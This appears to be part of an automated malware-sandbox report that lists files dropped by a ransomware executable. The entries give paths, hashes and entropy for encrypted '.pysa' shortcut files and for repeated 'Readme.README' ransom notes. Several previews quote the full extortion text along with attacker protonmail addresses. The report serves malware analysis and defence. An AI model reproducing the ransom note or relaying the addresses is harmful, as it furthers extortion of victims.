                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22386
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEB:9
                  MD5:05388007C4083607204EE6ED76A05084
                  SHA1:DB4F763C237EA6749F3A204F6B5CC7ABFD9A0411
                  SHA-256:C683024A96BE04EBA3207EFC41C62A2C6DEFDE47C044FB8A162EC9AC7A119060
                  SHA-512:FD683D9179E043915A30C71D90B0C0B4EB33B00D74871664792BC082BD1F5701A1CED2785A4CE22A60134422E7587C383E7815F4EB712310AF204F0D295BB71A
                  Malicious:false
                  C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25584
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEr:3
                  MD5:BC8525A2688651EC274A6D322DD3E7FC
                  SHA1:23890076CFE4EA74DABC1F9908EEC2C5B2A3783C
                  SHA-256:31B80935D45D34D58CED055ED1E15B959EEE5C73EC28D6A92BA41989116F292A
                  SHA-512:41982FC816D72DDEEFE918F327754BEA7D08745CB6479127767E5EAF9EE2A9B0EA39473CD11D82464F39BC5B358E3D72EBC0C152DDD078E7B7F9A52BAB9871F9
                  Malicious:false
                  C:\Users\Default\AppData\Local\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25584
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEr:3
                  MD5:BC8525A2688651EC274A6D322DD3E7FC
                  SHA1:23890076CFE4EA74DABC1F9908EEC2C5B2A3783C
                  SHA-256:31B80935D45D34D58CED055ED1E15B959EEE5C73EC28D6A92BA41989116F292A
                  SHA-512:41982FC816D72DDEEFE918F327754BEA7D08745CB6479127767E5EAF9EE2A9B0EA39473CD11D82464F39BC5B358E3D72EBC0C152DDD078E7B7F9A52BAB9871F9
                  Malicious:false
                  C:\Users\Default\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047266577552996
                  Encrypted:false
                  SSDEEP:48:ZtmUvjC0emBo4TpHVhz1fkjnTQVla64fKZmO0YsThuyLY3aEf0C9rD4FcR4s:ZMipBoUYcVlaJfKZmO0HhpY3f0CVMFW3
                  MD5:761C6EF65F2D273D8B5FCD0BC045A678
                  SHA1:C9CC0C263C853765A0022E7C02F9501B67015253
                  SHA-256:ABA15FB54BC7F6B3E845449F788257B9605D8302B201D80CC8B1BCD949D5A336
                  SHA-512:19F3041F5082FFA92F7FACBA02E08E37B4E67F9D78720259802CDA11F8EDC71127DC919164FE5DB2BAFD83CA063F3874F1B3A9E62CB45682C375FBBD83D1CA9D
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047698637791427
                  Encrypted:false
                  SSDEEP:48:j9cJvRe6mcHOM2WsaqnfdsgOrEalRlQmPrWDHiCKhe3EAvBuE/Hy/iQY/5RnA1Ks:JcJvRe6mMT1sTBQxdV6biCKhe3EAoE/W
                  MD5:4C7055F2F52394A64F7ADC69B020F248
                  SHA1:2BB081F2CBE76AA861C793D3D2DD4BABF6497DFE
                  SHA-256:4E6E8AE697F2E1F84F6205E75EA68DAD24F3B89067154FF13FDCAA7E4E85F7DE
                  SHA-512:4DFFDDD30CDCBFC5A5AD8BEC7481D0A2D29BB64C480B4153F07DCC69D07A070AEDD4961F46A90CC91B6F872C95173FF6E94EA7D7BF7EB28C342494EFBA80B210
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.049264424966879
                  Encrypted:false
                  SSDEEP:48:dT5pBgKu2niR95jvgaVmbxzVDrvCshchmmgrev8o1psCWxc1P9jgvzqdc2NuQcTE:vpmXGiZvZobFJDchT5v8cbHjq26bQm+P
                  MD5:98D5232F903FF6F7E8C625CED5E8A55D
                  SHA1:90812CFAD2D18803F25F3209AA8342FC27FE2165
                  SHA-256:5B186DF794856ED168365B5EE4EF4DE15896D6A880BACE67EC6707A83FDEDD54
                  SHA-512:A3970C8CE52620253C37C65333685CC4CEAEAB1ECCD78D5727AB433F167F175BCF66407E1C6701019129CCFE84A743225727F313699A82CD5D17ED0422ADA303
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02846309191236
                  Encrypted:false
                  SSDEEP:48:ghOaLLnq87waEkxM2zR3YBWWv1mN7TCQzAgpWCAT2jrt0tVvdoNZqpVC9u:ghLq87wSNqBWWvkjsgpe4vS
                  MD5:94D774F49FC40DBCDBC7E72B77471A37
                  SHA1:30AF7FB29899C8B1F302F25A391822E519157E19
                  SHA-256:45F3FE5BCB9D935FDC3355EF3D24447DEC8723AD4F03403AA8E6042AA529B2A5
                  SHA-512:BF66E75EC07A189C1AD2DEBED8C5DA39D34684BA7475BC4A00C5B963A6058759833071A89C729F9CA16E647A5A540B976A8D2E461A129C9DC238712A03743370
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0595510017070975
                  Encrypted:false
                  SSDEEP:48:r9ra5YI8dFCjyvkHbGOKUY4EmTsmIFzeQDR8dzv2vz8VlsNCxHDUKT0xZGo11+vt:4YPdFGbG5zzmT2FzeLuvl8xJTasvt
                  MD5:4AB75267700963C62A1A05136B492A70
                  SHA1:B637E0C0DE0508128C2D0B8B40314E2BC173525B
                  SHA-256:2A90011B80DA1571F6788C1FF581FD72B43B051C54D30E0AC8926D970CA1E126
                  SHA-512:F23030BD8946C5E11535F181F613221953D74B9B31B39E5FD5713B7D4EC781A07895873B250BCAFE3EDD8DCCD543BD91166389F10D7876E717FD5C92E552F8BB
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.039539345438253
                  Encrypted:false
                  SSDEEP:48:wZ86+4gcP2BEy/xMYRpMlqRrYNWPgxfEdxHOPXag0uTMhrQxZrBtrJRbqZdJh6NO:e+4gU2iQRpReNpEdpOfaH2oqhBtqviNO
                  MD5:40F8983FEE03096FCDA8C985245B5BCB
                  SHA1:56C84D98CE37C74D743C8A30BE80B4E6CBBB2479
                  SHA-256:DF083909D8C9F32941BBD3532685B4794B4F1173352D0CE203C7D57C6393F0A8
                  SHA-512:21E6146A446A9A94D22DFB4CC5910E32B5632BDD96682BC2BD06FA0E0D259F07957F33D236C9FBC40E1DC4EDB3EE9A04AB776620A9069D2A0BF1F66A53914BC9
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.791903001433444
                  Encrypted:false
                  SSDEEP:96:OKKDQUDuULhaf4YJwwGDg9JPlChEzSGYhWz2lOZQUvyb+:OHf6W64YjGDmJ9CC2OjvyC
                  MD5:0CCC7E8C2D878F9008E5AFBAEE963AD7
                  SHA1:7D463C7957948B371C2EF52B5067ACC13B979DD3
                  SHA-256:4E517CB50F6B7200393376F3C3A62C52148A807D19C431190CC601C25D184BF4
                  SHA-512:2A7AE6223DB211B9E0325C5B8A2260ED89E5653412740D0EA7AADC3D552FF0B7F7CC2D1EDC652BCDE8587C43DA692FA51507EFF231E4893B86F0B17B742A7F81
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041154790141443
                  Encrypted:false
                  SSDEEP:48:poZjSc7ETtBaGqfmo9Rvq0zA4t+HikrOG7D+xBGrxDiNNof6hv3GewbQbYzpj4X:eJt7ES7fmEJzn7k6G7D+xBMx0Nof0v3p
                  MD5:8FDF630663CDB410D8BDDF1D56A61055
                  SHA1:753FCF9BEFAB0068516D572032031AFA8BFFE795
                  SHA-256:D7DE7F1BE5B9444BF9EF8D5D4084A1846B97BB043D158563042FAFD5667ADE39
                  SHA-512:F50EA3E26FFE8F11E414F01EE95B5887E72AC1DB307C1D82ACC8227570B0598B388026D012189B4037BE2114B291381676ECD2FAB84B2D1B76E5EC36E31F96F5
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041906484173489
                  Encrypted:false
                  SSDEEP:48:F7vV95Hu5gSE20cfSzj6i19Xd91d6WxByKzNHn+WAS/3uhj/hxvOTPXbUdRuY2Ke:t9UAj/19N91d60ByKzwWAe3uhj/h50P7
                  MD5:E091A28533F502397A3B62B9BA2B654D
                  SHA1:8E778F819A4B15CD9BA6BFBDD1D5A340948FBAB3
                  SHA-256:7D565D58802266D6298F889E34E3F6B68E0E201A44373AE6F99C74F1D7E9B67F
                  SHA-512:5349B4E88DEAFC452808476AB09CE6AAD78C6785E4B8F9E659D2AA453F8A717602426F6B92A73AC165A40EC99276E821592D9998D91FC9850EC83DABBC5868F5
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.787702273357067
                  Encrypted:false
                  SSDEEP:96:+yeVOCq7HsMnoBAgzE/XLO2Xv6joCcIxo:+d5hMnQnzE/FXv6ULI6
                  MD5:A98EFC5DA0536CE69723169B36E263D9
                  SHA1:0B56B83612BD86A39A98EF6F8F1A0496A1B4A1EE
                  SHA-256:1BE3A2EC46D6423E715FFED9AFDEB447A9714C46D8D7AAF84AFEF8A81D714BFE
                  SHA-512:FF9C36085AC5EC398E6F5CD215B0B1A9EB1997DCC21DFA1837615C3DB15E28B4B2E398F0D862AA4269A305D68C0C718E478FDB35AF36785D6646D27E815C4BB5
                  Malicious:false
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
